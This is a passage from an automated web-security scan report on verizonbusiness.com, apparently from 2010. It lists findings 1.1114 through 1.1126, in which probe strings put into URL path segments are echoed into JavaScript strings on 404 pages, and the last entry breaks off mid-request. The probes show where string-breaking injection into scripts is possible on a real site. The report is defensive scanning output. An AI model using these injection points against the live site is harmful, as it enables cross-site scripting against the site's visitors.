GET /uk273a8'%3bb5d548f241a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/uk273a8';b5d548f241a/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1114. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba54"%3b405db27b986 was submitted in the REST URL parameter 1. This input was echoed as 8ba54";405db27b986 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk8ba54"%3b405db27b986/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:00 GMT
Content-Type: text/html
Content-Length: 40615
Date: Wed, 17 Nov 2010 01:00:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk8ba54";405db27b986/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1115. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8578'%3b68d588f1527 was submitted in the REST URL parameter 1. This input was echoed as b8578';68d588f1527 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ukb8578'%3b68d588f1527/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40643
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/ukb8578';68d588f1527/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1116. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 949c6"%3bbe26c5ba2e7 was submitted in the REST URL parameter 1. This input was echoed as 949c6";be26c5ba2e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk949c6"%3bbe26c5ba2e7/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Date: Wed, 17 Nov 2010 01:00:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk949c6";be26c5ba2e7/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1117. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a5b"%3b307c3d2f00c was submitted in the REST URL parameter 2. This input was echoed as 13a5b";307c3d2f00c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions13a5b"%3b307c3d2f00c/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41174
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk/solutions13a5b";307c3d2f00c/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1118. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ad43'%3b3a75ff4b38 was submitted in the REST URL parameter 2. This input was echoed as 1ad43';3a75ff4b38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions1ad43'%3b3a75ff4b38/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41170
Date: Wed, 17 Nov 2010 01:01:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/uk/solutions1ad43';3a75ff4b38/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1119. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 876a6"%3b542aff1d128 was submitted in the REST URL parameter 3. This input was echoed as 876a6";542aff1d128 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions/var876a6"%3b542aff1d128/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42386
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/uk/solutions/var876a6";542aff1d128/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1120. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /uk/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75025'%3ba91d526cf44 was submitted in the REST URL parameter 3. This input was echoed as 75025';a91d526cf44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /uk/solutions/var75025'%3ba91d526cf44/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42386
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/uk/solutions/var75025';a91d526cf44/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1121. http://www.verizonbusiness.com/us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588ef"%3bc50caadca2d was submitted in the REST URL parameter 1. This input was echoed as 588ef";c50caadca2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us588ef"%3bc50caadca2d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us588ef";c50caadca2d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1122. http://www.verizonbusiness.com/us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efa27'%3b98076ea682b was submitted in the REST URL parameter 1. This input was echoed as efa27';98076ea682b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usefa27'%3b98076ea682b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:28 GMT
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/usefa27';98076ea682b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1123. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4212d'%3bc14296dd7ac was submitted in the REST URL parameter 1. This input was echoed as 4212d';c14296dd7ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us4212d'%3bc14296dd7ac/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40643
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/us4212d';c14296dd7ac/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1124. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abf11"%3b50f43ee870c was submitted in the REST URL parameter 1. This input was echoed as abf11";50f43ee870c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usabf11"%3b50f43ee870c/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/usabf11";50f43ee870c/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1125. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 124ca'%3b8c07802eca4 was submitted in the REST URL parameter 2. This input was echoed as 124ca';8c07802eca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions124ca'%3b8c07802eca4/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41611
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/us/solutions124ca';8c07802eca4/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1126. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21c4b"%3bd72783d0bad was submitted in the REST URL parameter 2. This input was echoed as 21c4b";d72783d0bad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions21c4b"%3bd72783d0bad/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
